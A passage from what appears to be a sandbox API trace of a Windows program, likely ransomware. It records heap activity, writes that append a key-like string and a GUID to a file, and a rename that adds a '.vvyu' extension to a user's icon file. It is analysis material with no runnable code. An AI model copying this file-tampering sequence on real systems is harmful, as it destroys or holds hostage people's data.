Flags=0x0, Size=0x10) returned 0x2ae6ba8 [0200.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0200.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0200.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7d70 | out: hHeap=0x2c0000) returned 1 [0200.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0200.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0200.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7630 [0200.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0200.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ae8 [0200.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0200.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf6e0 [0200.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0200.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0200.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b78 | out: hHeap=0x2c0000) returned 1 [0200.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2adf8f0 [0200.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7630 | out: hHeap=0x2c0000) returned 1 [0200.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x29dcde8 [0200.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0200.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0200.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0200.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af3f88 [0200.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0200.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0200.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0200.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31bca0 | out: hHeap=0x2c0000) returned 1 [0200.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0200.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0200.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0200.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0200.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8f0 | out: hHeap=0x2c0000) returned 1 [0200.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29dcde8 | out: hHeap=0x2c0000) returned 1 [0200.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0200.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ba8 | out: hHeap=0x2c0000) returned 1 [0200.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0200.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b48 | out: hHeap=0x2c0000) returned 1 [0200.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26668 | out: hHeap=0x2c0000) returned 1 [0200.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b30 | out: hHeap=0x2c0000) returned 1 [0200.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b90 | out: hHeap=0x2c0000) returned 1 [0200.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0200.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42628 | out: hHeap=0x2c0000) returned 1 [0200.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0200.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d4c0 | out: hHeap=0x2c0000) returned 1 [0200.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a057e0 | out: hHeap=0x2c0000) returned 1 [0200.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0200.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0200.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0200.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0200.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0200.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0200.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0200.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0200.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0200.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0200.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a79478 | out: hHeap=0x2c0000) returned 1 [0200.172] WriteFile (in: hFile=0x52c, lpBuffer=0x2adc6d0*, nNumberOfBytesToWrite=0x10b9, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2adc6d0*, lpNumberOfBytesWritten=0x2f9fb14*=0x10b9, lpOverlapped=0x0) returned 1 [0200.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adc6d0 | out: hHeap=0x2c0000) returned 1 [0200.173] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x10be, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.173] WriteFile (in: hFile=0x52c, lpBuffer=0x2ae02d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae02d8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0200.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0200.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0200.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e0 [0200.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0200.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0200.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0200.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0200.175] WriteFile (in: hFile=0x52c, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0200.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.176] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0200.176] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0200.176] CloseHandle (hObject=0x52c) returned 1 [0200.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0200.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x900) returned 0x2af3f88 [0200.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0200.178] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\internet explorer\\services\\search_{0633ee93-d776-472f-a0ff-e1416b8b2e3a}.ico"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico.vvyu" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\internet explorer\\services\\search_{0633ee93-d776-472f-a0ff-e1416b8b2e3a}.ico.vvyu")) returned 1 [0200.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0200.196] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0200.200] FindNextFileW (in: hFindFile=0x2a05e28, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7525ca20, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x7525ca20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x7525ca20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x10be, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico", cAlternateFileName="SEARCH~1.ICO")) returned 0 [0200.200] FindClose (in: hFindFile=0x2a05e28 | out: hFindFile=0x2a05e28) returned 1 [0200.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0200.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa000 | out: hHeap=0x2c0000) returned 1 [0200.201] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0200.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29add10 [0200.201] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0200.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0200.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0200.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0200.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0200.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0200.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0200.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0200.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0200.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0200.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0200.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0200.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0200.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) 